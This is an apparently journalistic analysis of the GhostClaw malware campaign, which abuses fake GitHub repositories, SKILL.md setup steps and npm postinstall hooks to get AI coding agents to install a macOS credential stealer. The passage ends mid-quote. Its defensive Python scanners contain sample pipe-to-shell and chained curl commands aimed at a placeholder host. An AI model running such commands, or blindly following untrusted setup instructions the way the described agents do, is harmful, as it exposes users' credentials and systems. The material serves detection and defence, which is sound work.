GhostClaw Malware Emerges as a Critical Threat, Targeting Autonomous AI Agents in a New Era of Software Supply Chain Attacks

The digital security landscape is witnessing a profound shift as threat actors increasingly adapt their methodologies to exploit emerging technologies. A novel and highly concerning malware campaign, dubbed GhostClaw or GhostLoader, has been identified, specifically designed to target the burgeoning ecosystem of AI agents and their integrated workflows. This sophisticated threat represents a significant escalation in software supply chain attacks, moving beyond human developers to ensnare autonomous AI agents, particularly those like OpenClaw, operating within development environments. The primary objective of GhostClaw is the exfiltration of sensitive data, including system credentials, browser information, developer tokens, and cryptocurrency wallet details, underscoring the severe financial and operational risks posed to organizations embracing AI-assisted development.

This alarming development was first brought to light by the meticulous analysis of JFrog Security Research, with subsequent in-depth investigations by Jamf Threat Labs further dissecting the malware’s intricate mechanisms. Their collective findings paint a stark picture: GhostClaw is not merely another variant of credential-stealing malware; it signifies a strategic pivot by malicious actors to a new attack vector – the AI agent itself. Historically, software supply chain attacks have focused on injecting malicious code into legitimate software components or development tools that human developers would then unknowingly incorporate into their projects. GhostClaw, however, ingeniously constructs traps within GitHub repositories and package managers that are autonomously triggered by AI agents, transforming these bots into unwitting conduits for malware delivery. This approach bypasses traditional human vigilance, exploiting the very automation that makes AI agents so attractive to developers.

The Proliferation of AI Agents and the Genesis of a New Vulnerability

The rapid evolution and adoption of artificial intelligence have ushered in a new era of software development, characterized by the integration of AI agents designed to automate, optimize, and streamline coding tasks. These autonomous entities, capable of understanding context, executing commands, and interacting with various system components, promise unprecedented gains in productivity. OpenClaw stands out as a prominent example of such an open-source AI agent, functioning as an always-on coding assistant. Running local models continuously requires substantial computational power, which has driven a notable surge in demand for powerful local machines such as Apple’s Mac Mini, favored by developers because its unified memory architecture handles resource-intensive AI servers efficiently.

The inherent design of these AI agents necessitates granting them high-level system permissions, including shell access, file system control, and browser manipulation, to enable their full functionality. Developers, seeking to maximize the utility of these tools, often grant these extensive privileges, implicitly trusting that the agents will execute only safe and intended commands. This trust, while foundational to the operational model of AI agents, simultaneously creates a significant security vulnerability. GhostClaw exploits this exact paradigm, leveraging the elevated permissions granted to AI agents to establish a persistent Remote Access Trojan (RAT) once executed, effectively turning the agent’s host system into a compromised asset. The malware’s emergence serves as a critical wake-up call for development teams, highlighting that the bot, rather than solely the human, has become a primary and highly lucrative attack surface.

Chronology of Discovery and Analysis

The initial detection of GhostClaw by JFrog Security Research marked a pivotal moment in understanding the evolving threat landscape. Their researchers, observing unusual activity patterns, were able to identify the unique characteristics of this malware, which distinguished it from conventional threats. Following this initial discovery, Jamf Threat Labs undertook an independent and comprehensive analysis, corroborating JFrog’s findings and providing deeper insights into the malware’s operational mechanics and its specific optimization for macOS environments.

This timeline underscores the dynamic nature of cybersecurity threats, where early detection by research entities is crucial for understanding and mitigating emerging risks. The coordinated efforts of these security firms allowed for a rapid dissection of GhostClaw’s multi-stage infection process, from its social engineering roots on GitHub to its credential-stealing payload and persistent presence on compromised systems. The immediate sharing of this intelligence within the cybersecurity community has been vital in raising awareness about this novel attack vector.

The Mechanics of GhostClaw: A Multi-Stage Attack

Understanding GhostClaw’s operational framework requires a detailed examination of its sophisticated, multi-stage attack methodology, meticulously crafted to ensnare both AI agents and unsuspecting human developers.

1. Social Engineering and Repository Staging: The initial phase of the GhostClaw campaign hinges on deceptive social engineering tactics. Attackers create GitHub repositories that meticulously mimic legitimate developer utilities, automated trading bots, or seemingly innocuous AI plugins. To circumvent immediate detection and build a facade of legitimacy, these repositories are initially kept benign. During an "incubation period," typically spanning five to seven days, the attackers passively accumulate GitHub stars and follower counts. This manufactured popularity and perceived credibility serve as a crucial lure. Once a sufficient level of trust is established, the attackers covertly swap the benign code with a malicious payload, transforming the trusted repository into a trap.
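The incubation pattern described above suggests a simple screening heuristic: a repository that is only days old yet already has many stars and very few commits deserves extra scrutiny before anyone, human or agent, runs its setup steps. The Python sketch below assumes the reviewer has already gathered the creation date, star count, and commit count by some trusted means. The `RepoSnapshot` type, the `looks_incubated` function, and all thresholds are hypothetical and are not drawn from the JFrog or Jamf research.

```python
from dataclasses import dataclass
from datetime import date


@dataclass
class RepoSnapshot:
    # Hypothetical summary of a repository, collected by the reviewer.
    created: date
    observed: date
    stars: int
    commits: int


def looks_incubated(repo: RepoSnapshot,
                    max_age_days: int = 14,
                    min_stars: int = 100,
                    max_commits: int = 5) -> bool:
    """Flag young repositories whose popularity outpaces their development history.

    The default thresholds are illustrative assumptions, not published indicators.
    """
    age_days = (repo.observed - repo.created).days
    return (age_days <= max_age_days
            and repo.stars >= min_stars
            and repo.commits <= max_commits)


# Usage: a week-old repository with 450 stars and 3 commits is flagged.
print(looks_incubated(RepoSnapshot(date(2024, 5, 1), date(2024, 5, 8), 450, 3)))  # True
```

A flag here is only a reason to look closer; a patient attacker can pad commit history, so this check complements, rather than replaces, reading the setup scripts.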



2. Exploiting AI Agent Workflows via SKILL.md: A critical innovation of GhostClaw lies in its exploitation of the SKILL.md file format, which defines external capabilities for AI agents to interact with the broader system (e.g., reading local files, executing shell commands, managing emails). In the malicious GitHub repositories, the SKILL.md file itself contains no overtly malicious code. Instead, it presents benign metadata, dependencies, and commands. However, the trap is sprung when an AI agent or a human developer attempts to follow the repository’s setup instructions. This usually involves running an install.sh script or installing dependencies via a package manager.
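Because the SKILL.md file itself looks clean, a review has to focus on the setup steps it points to. As a rough illustration, the Python sketch below scans the text of a SKILL.md or README for lines that hand control to unreviewed code: piping a download into a shell, running an install.sh script, or installing an npm package globally. The rule names and regular expressions are assumptions chosen for illustration, not a vetted detection ruleset, and a clean result does not make a repository safe.

```python
import re

# Hypothetical rules: each pattern marks a setup step that runs code the reader
# may not have reviewed. Illustrative only, not a complete ruleset.
RISKY_PATTERNS = {
    "pipe-to-shell": re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba|z)?sh\b"),
    "run-install-script": re.compile(r"\b(?:ba|z)?sh\s+\S*install\.sh\b|\./install\.sh\b"),
    "global-npm-install": re.compile(r"\bnpm\s+(?:install|i)\s+(?:-g|--global)\b"),
}


def risky_setup_steps(text: str) -> list[tuple[int, str]]:
    """Return (line number, rule name) for each line of setup text that matches a rule."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RISKY_PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, name))
    return hits


sample = """## Setup
curl -fsSL https://example.invalid/setup.sh | bash
npm install -g example-agent-plugin
./install.sh
"""
print(risky_setup_steps(sample))
# [(2, 'pipe-to-shell'), (3, 'global-npm-install'), (4, 'run-install-script')]
```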

3. Malicious npm Package Integration: JFrog researchers specifically observed this behavior within malicious npm packages. These packages, masquerading as legitimate OpenClaw installers, appear benign in their configuration. The exposed source code within the package often contains harmless decoy utilities, further enhancing the illusion of legitimacy. The actual malware, however, is hidden within installation scripts that run automatically. A key mechanism here is the postinstall hook, a lifecycle script in the Node Package Manager (npm) that is executed automatically once a package has been installed, with no further action from the user. This hook silently reinstalls the malicious package globally and places a malicious binary onto the system path, setting the stage for the next phase of the attack.
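To see which packages would run code at install time, one can read the scripts field of each package.json. npm runs the preinstall, install, and postinstall lifecycle scripts automatically during installation, and running npm install with --ignore-scripts suppresses them. The Python sketch below lists those hooks for a single manifest and for everything under a node_modules directory. The function names are hypothetical, and a listed hook is only a prompt for manual review, since many legitimate packages also use install scripts.

```python
import json
from pathlib import Path

# npm runs these lifecycle scripts automatically when a package is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def install_hooks(package_json_text: str) -> dict[str, str]:
    """Return the install-time lifecycle scripts declared in one package.json document."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") if isinstance(manifest, dict) else None
    if not isinstance(scripts, dict):
        return {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def scan_node_modules(project_root: str) -> dict[str, dict[str, str]]:
    """Report every package.json under node_modules that declares an install hook."""
    findings = {}
    for manifest_path in Path(project_root, "node_modules").rglob("package.json"):
        try:
            hooks = install_hooks(manifest_path.read_text(encoding="utf-8"))
        except (OSError, UnicodeDecodeError, json.JSONDecodeError):
            continue  # unreadable or malformed manifest: skip it rather than abort the scan
        if hooks:
            findings[str(manifest_path.parent)] = hooks
    return findings


# Usage: prints {'postinstall': 'node setup.js'}
print(install_hooks('{"name": "demo", "scripts": {"test": "jest", "postinstall": "node setup.js"}}'))
```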

4. The Obfuscated First-Stage Dropper: Once the malicious script is executed, an obfuscated first-stage dropper takes over. This dropper is engineered to perform several preliminary checks to ensure optimal execution:

- Host Architecture Verification: It identifies the system’s architecture to deploy the appropriate malicious components.

- macOS Version Check: It verifies the macOS version to ensure compatibility and exploit specific system features.

- Node.js Installation Check: Crucially, it checks for the presence of Node.js. If Node.js is missing, the script downloads it using the curl command with the -k flag. This flag instructs curl to skip verification of the server’s TLS (Transport Layer Security) certificate, allowing the download to proceed over a connection whose authenticity has not been verified.
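Install scripts that fetch tools with certificate verification disabled are easy to spot with a small check. The Python sketch below tokenizes each shell line with the standard shlex module and reports curl invocations that pass --insecure or a short-option cluster containing k (for example -k or -fsSLk). It is a heuristic under stated assumptions: it ignores line continuations, variables, and aliases, and it may misread options whose arguments are glued to the flag. The function names are hypothetical.

```python
import shlex

# Tokens that end one command and start another on the same line.
SEPARATORS = {"|", "||", "&&", ";", "&"}


def curl_skips_tls_verification(line: str) -> bool:
    """Heuristically report whether a shell line runs curl with -k/--insecure."""
    try:
        tokens = shlex.split(line, comments=True)
    except ValueError:
        tokens = line.split()  # unbalanced quotes: fall back to a naive split
    in_curl = False
    for tok in tokens:
        if tok in SEPARATORS:
            in_curl = False  # a new command starts after a separator
        elif tok.rsplit("/", 1)[-1] == "curl":
            in_curl = True  # matches both "curl" and paths such as /usr/bin/curl
        elif in_curl and (tok == "--insecure"
                          or (tok.startswith("-") and not tok.startswith("--") and "k" in tok)):
            return True
    return False


def flag_insecure_downloads(script: str) -> list[int]:
    """Return the 1-based line numbers of a script that disable curl's certificate checks."""
    return [n for n, line in enumerate(script.splitlines(), start=1)
            if curl_skips_tls_verification(line)]


example = "#!/bin/sh\ncommand -v node || curl -fsSLk https://example.invalid/node.pkg -o /tmp/node.pkg\n"
print(flag_insecure_downloads(example))  # [2]
```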

While bypassing TLS might appear to be an advanced evasion tactic, Jaron Bradley, Director at Jamf Threat Labs, offered a pragmatic perspective: "Honestly, in most cases this comes down to operational laziness on the attacker’s side rather than any deliberate evasion strategy. Setting up proper TLS verification requires a level of infrastructure investment that many threat actors simply don’t bother with — especially when curl -k gets the job done just as well for their purposes." This insight suggests that while the attack is sophisticated in its targeting, some elements reveal a prioritization of efficiency over intricate technical evasion.

5. Maintaining the Illusion and Initiating Credential Theft: To sustain the deception and keep the victim (whether human or AI agent) unsuspecting, the malware executes a branded, terminal-based installation experience. This includes fake progress bars and other visual cues, giving the impression that the OpenClaw agent or the promised developer tool is successfully installing on the host system. This manufactured output simulates a standard, time-consuming dependency installation, effectively lulling the developer—or more critically, the AI agent monitoring command-line logs—into a false sense of security. It is precisely at this juncture, just before the apparent completion of the benign installation, that the malware launches its credential-stealing prompts, designed to harvest sensitive user data.

Living off the Land (LotL): A Stealthy Approach

The execution phase of GhostClaw strikingly illustrates why traditional signature-based security tools often struggle against modern malware. The operators employ a technique known as "Living off the Land" (LotL), which involves utilizing legitimate, pre-installed operating system tools to carry out malicious actions, rather than deploying custom executable files that antivirus software can easily flag.

On UNIX-based platforms like macOS, administrators and power users routinely employ thousands of native binaries for standard scripting and system management. GhostClaw cunningly exploits two such tools: dscl and osascript.

- dscl (Directory Service command line utility): This native tool is designed for creating, reading, and managing directory data. GhostClaw abuses dscl to silently validate system passwords in the background. Because the malware relies on a legitimate system utility, its actions appear as routine system operations, making them difficult to distinguish from benign activity.

- osascript (AppleScript execution tool): GhostClaw uses osascript to generate native-looking prompts that trick users into divulging their credentials. These prompts are designed to mimic legitimate macOS system dialogs, making them highly convincing to unsuspecting users.
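The two LotL patterns can be expressed as simple command-line rules. dscl’s -authonly command checks a user’s password, and AppleScript’s display dialog command can collect typed input with hidden answer, which is one way to produce a native-looking password box. The Python sketch below labels process argument vectors that match either pattern. The function and label names are hypothetical, and these rules will also match legitimate administrative scripts, which is exactly the overlap that makes LotL activity hard to triage.

```python
from typing import Optional


def classify_command(argv: list[str]) -> Optional[str]:
    """Label argument vectors matching the dscl and osascript patterns described above."""
    if not argv:
        return None
    program = argv[0].rsplit("/", 1)[-1]  # accept both "dscl" and "/usr/bin/dscl"
    if program == "dscl" and "-authonly" in argv[1:]:
        return "dscl-password-check"  # shape: dscl <node> -authonly <user> <password>
    if program == "osascript":
        script = " ".join(argv[1:]).lower()
        if "display dialog" in script and "hidden answer" in script:
            return "osascript-password-prompt"  # dialog with a masked text field
    return None


print(classify_command(["/usr/bin/dscl", ".", "-authonly", "alice", "example"]))  # dscl-password-check
```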

The challenge for Endpoint Detection and Response (EDR) tools lies in this overlap. Because system administrators and developers frequently execute heavy, script-based workflows using these very binaries, the malicious activity generated by GhostClaw can look nearly identical to legitimate work. This inherent ambiguity results in a high potential for false positives if EDR systems are too aggressive, or, conversely, a blind spot if they are too permissive.

As Jaron Bradley highlighted, detecting such sophisticated LotL activity requires a deeper level of analysis: "When you see [dscl] being invoked in a context that doesn’t align with normal admin workflows, that’s a reliable signal worth investigating. Security engineers should be looking at the full execution chain: what spawned the process, what user context it ran under, and whether it’s showing up alongside other suspicious behaviors like unusual osascript prompts or outbound connections shortly after." This emphasizes the need for behavioral analysis and correlation of events across the system, rather than relying solely on individual process flags.
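Bradley’s advice to examine the full execution chain can be sketched as a correlation rule over process-start events: raise an alert when dscl is launched with a Node.js or npm process among its ancestors and an osascript process starts within a short time window. The `ProcEvent` record, the ancestor set, and the 60-second window below are assumptions for illustration only; real EDR telemetry is far richer, and a production rule would also weigh user context and outbound network connections, as the quote suggests.

```python
from dataclasses import dataclass


@dataclass
class ProcEvent:
    # Hypothetical, simplified process-start record.
    pid: int
    ppid: int
    name: str
    user: str
    ts: float  # start time in seconds


# Assumption: ancestors suggesting the process came from a package install or Node.js script.
INSTALLER_ANCESTORS = {"node", "npm", "npx"}


def ancestry(event: ProcEvent, by_pid: dict[int, ProcEvent]) -> list[str]:
    """Return the names of the event's ancestors, nearest parent first."""
    names, seen = [], set()
    parent = by_pid.get(event.ppid)
    while parent is not None and parent.pid not in seen:  # seen guards against cycles
        seen.add(parent.pid)
        names.append(parent.name)
        parent = by_pid.get(parent.ppid)
    return names


def correlate(events: list[ProcEvent], window: float = 60.0) -> list[tuple[int, str, list[str]]]:
    """Flag dscl launched under an installer chain with an osascript start nearby in time."""
    by_pid = {e.pid: e for e in events}
    prompt_times = [e.ts for e in events if e.name == "osascript"]
    alerts = []
    for e in events:
        if e.name != "dscl":
            continue
        chain = ancestry(e, by_pid)
        from_installer = any(name in INSTALLER_ANCESTORS for name in chain)
        near_prompt = any(abs(t - e.ts) <= window for t in prompt_times)
        if from_installer and near_prompt:
            alerts.append((e.pid, e.user, chain))
    return alerts


events = [
    ProcEvent(1, 0, "launchd", "root", 0.0),
    ProcEvent(10, 1, "npm", "alice", 1.0),
    ProcEvent(11, 10, "node", "alice", 2.0),
    ProcEvent(12, 11, "osascript", "alice", 5.0),
    ProcEvent(13, 11, "dscl", "alice", 8.0),
    ProcEvent(20, 1, "Terminal", "bob", 1.0),
    ProcEvent(21, 20, "dscl", "bob", 9.0),  # admin use from a terminal: not flagged
]
print(correlate(events))  # [(13, 'alice', ['node', 'npm', 'launchd'])]
```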

Defense Strategies in the Age of AI Agents

The emergence of GhostClaw necessitates a re-evaluation of cybersecurity practices for both individual developers and organizations. Defending against such a nuanced threat requires a multi-layered approach.

For Individual Developers:

A fundamental shift in daily habits is paramount. Attackers actively exploit the "set it and forget it" mentality prevalent in package management, where developers rarely re-examine an open-source package after its initial installation. Preventing an infection demands proactive vigilance:

- Thorough Repository Vetting: Before running any setup scripts, developers must scrutinize GitHub repositories. This includes checking the commit history for sudden anomalies, reviewing the code within setup scripts for suspicious commands, and exercising skepticism towards projects that accumulate stars rapidly without a corresponding history of substantial development activity.

- Code Review: Even seemingly benign SKILL.md or package.json files should be viewed with a critical eye, especially regarding postinstall or similar hooks that can trigger hidden scripts.

- Skepticism of Prompts: Be highly suspicious of unexpected system prompts requesting credentials, even if they appear legitimate. Verify the context and source before entering any sensitive information.

- Cross-Platform Awareness: While GhostClaw is currently optimized for macOS, the underlying vectors (GitHub, npm, AI agents) are platform-agnostic. The malware itself contains logic to perform automated actions on Windows systems, underscoring the need for vigilance regardless of the operating environment.
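Re-examining setup files before rerunning them guards against the benign-to-malicious swap that GhostClaw’s operators perform after the incubation period. One minimal approach, sketched below in Python, records a SHA-256 digest of every file that was actually reviewed and, before the next run, reports any file whose contents changed or that appeared or disappeared since the review. The function names are hypothetical; the standard hashlib module supplies the digests.

```python
import hashlib
from pathlib import Path


def fingerprint(files: dict[str, bytes]) -> dict[str, str]:
    """Map each file name to the SHA-256 digest of its contents."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in files.items()}


def read_files(paths: list[str]) -> dict[str, bytes]:
    """Load the setup files a reviewer actually read (install.sh, package.json, SKILL.md, ...)."""
    return {p: Path(p).read_bytes() for p in paths}


def changed_since_review(reviewed: dict[str, str], current: dict[str, bytes]) -> list[str]:
    """Return files whose contents differ from, or were added or removed since, the review."""
    now = fingerprint(current)
    names = sorted(set(reviewed) | set(now))
    return [n for n in names if reviewed.get(n) != now.get(n)]


# Usage: snapshot at review time, then compare before the next install.
reviewed = fingerprint({"install.sh": b"echo hello\n", "package.json": b"{}"})
print(changed_since_review(reviewed, {"install.sh": b"echo hello\n", "package.json": b"{}"}))  # []
```

In practice `read_files` would feed both calls, so the snapshot reflects the bytes on disk at review time.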

For Organizations and Security Teams:

- Advanced EDR and XDR Solutions: Implement next-generation EDR (Endpoint Detection and Response) and XDR (Extended Detection and Response) solutions capable of advanced behavioral analysis, anomaly detection, and correlation across multiple security layers. These tools should be tuned to detect unusual process execution chains and LotL tactics.

- Strict Access Controls for AI Agents: Implement granular permission controls and sandboxing for AI agents. Agents should operate with the principle of least privilege, only accessing resources absolutely necessary for their function. Isolating AI agent environments can limit the blast radius of a successful compromise.

- Supply Chain Security Best Practices: Enforce rigorous supply chain security protocols, including vulnerability scanning of third-party packages, dependency analysis, and maintaining an inventory of all software components.

- Developer Education and Training: Conduct regular training sessions for developers on identifying social engineering tactics, secure coding practices, and the specific risks associated with integrating AI agents and third-party packages.

- Continuous Monitoring: Establish continuous monitoring of development environments for suspicious network connections, unauthorized system modifications, and anomalous behavior patterns that could indicate a LotL attack.
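Least privilege for an agent can start with a gate that every proposed shell command must pass before execution. The Python sketch below is one hypothetical policy: it rejects shell metacharacters so an approved command cannot chain or redirect into another, and it allows only programs and subcommands listed in an allowlist. The allowlist contents and the `check_agent_command` name are assumptions; string filtering of this kind is easy to get wrong and should complement, not replace, operating-system sandboxing.

```python
import shlex
from typing import NamedTuple, Optional


class Decision(NamedTuple):
    allowed: bool
    reason: str


# Hypothetical policy: programs the agent may launch, mapped to permitted first
# arguments (None means any arguments are accepted).
ALLOWED: dict[str, Optional[set[str]]] = {
    "git": {"status", "diff", "log"},
    "npm": {"test"},
    "ls": None,
}

# Characters that would let a single approved command chain or redirect into others.
SHELL_METACHARACTERS = set(";|&`$<>\n")


def check_agent_command(command: str) -> Decision:
    """Decide whether a shell command proposed by an agent may run under the policy."""
    if any(ch in SHELL_METACHARACTERS for ch in command):
        return Decision(False, "shell metacharacters are not permitted")
    try:
        argv = shlex.split(command)
    except ValueError:
        return Decision(False, "command could not be parsed")
    if not argv:
        return Decision(False, "empty command")
    program, args = argv[0], argv[1:]
    if program not in ALLOWED:
        return Decision(False, f"{program} is not on the allowlist")
    permitted = ALLOWED[program]
    if permitted is not None and (not args or args[0] not in permitted):
        return Decision(False, f"this {program} subcommand is not permitted")
    return Decision(True, "allowed")


for cmd in ("git status", "npm install -g example-agent-plugin", "git status; curl -k https://example.invalid | sh"):
    print(cmd, "->", check_agent_command(cmd))
```

The policy deliberately omits npm install and npm ci, because both run the lifecycle scripts that GhostClaw abuses.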

The Evolving Attack Surface of AI Agents: Broader Implications

The GhostClaw campaign is more than just another malware incident; it unequivocally demonstrates a fundamental vulnerability embedded within the current trajectory of AI development. As the industry transitions from reactive coding copilots to increasingly autonomous agents, the traditional security paradigm is fracturing under the weight of new operational models.

AI agents, by their very nature, are designed to execute actions on behalf of the user, often without direct human oversight for every command. To fulfill their purpose effectively, they demand deep system permissions – shell access, file system control, browser manipulation, and more. When developers grant an agent these extensive privileges, they are implicitly extending their trust, assuming the agent will exclusively execute safe and intended commands.

GhostClaw masterfully subverts this dynamic. By ingeniously embedding malicious execution chains within the standard setup workflows that these agents are programmed to follow, the malware bypasses the human entirely. The critical insight here is that successfully "tricking the agent" achieves the exact same devastating result as "tricking the developer." As Jaron Bradley succinctly put it, "This shift is already underway. Autonomous coding agents have shown enormous promise, and that promise has attracted a wave of developers eager to adopt them — often before the security implications have been fully thought through. When adoption outpaces security, attackers notice."

This problem is further compounded by prevalent misconfigurations among early adopters. The enthusiasm to deploy autonomous agents often overshadows a thorough consideration of their security implications. Security researchers have already identified thousands of OpenClaw instances accidentally exposed to the open internet, running with default settings that allow external connections without any authentication. Such lax configurations provide a wide-open door for attackers to directly compromise these powerful agents.
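A quick self-audit for this misconfiguration is to ask two questions about an agent’s network listener: is it bound to an address other than loopback, and does it require authentication? The Python sketch below encodes those questions with the standard ipaddress module. The `bind_host` and `auth_required` inputs stand in for whatever settings a given agent exposes; they are hypothetical, not OpenClaw’s actual configuration keys.

```python
import ipaddress


def exposure_risk(bind_host: str, auth_required: bool) -> str:
    """Classify a hypothetical agent listener by who can reach it and whether it authenticates."""
    if bind_host.lower() == "localhost":
        return "loopback-only"
    try:
        if ipaddress.ip_address(bind_host).is_loopback:
            return "loopback-only"
    except ValueError:
        pass  # a hostname other than localhost: assume it may be reachable from the network
    # 0.0.0.0 and :: listen on every interface; any other address is reachable from some network.
    return "network-reachable-with-auth" if auth_required else "network-reachable-no-auth"


print(exposure_risk("0.0.0.0", auth_required=False))  # network-reachable-no-auth
```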

The implications are dire: when developers grant an AI agent root or administrative access to their machine, any malicious instruction the agent ingests or is tricked into executing instantly escalates into a system-level threat. This means a compromised AI agent could potentially wipe data, install backdoors, exfiltrate sensitive intellectual property, or launch further attacks within the network. Autonomous coding agents hold significant promise for boosting productivity and innovation across industries. However, until the industry collectively implements stringent sandboxing, robust permission controls, and comprehensive security audits for AI workflows, the bot will remain a highly lucrative and increasingly exploited attack surface for sophisticated threat actors.

"As long as that gap exists, we’ll absolutely see more of this," Bradley concluded. "Tricking the agent is tricking the human —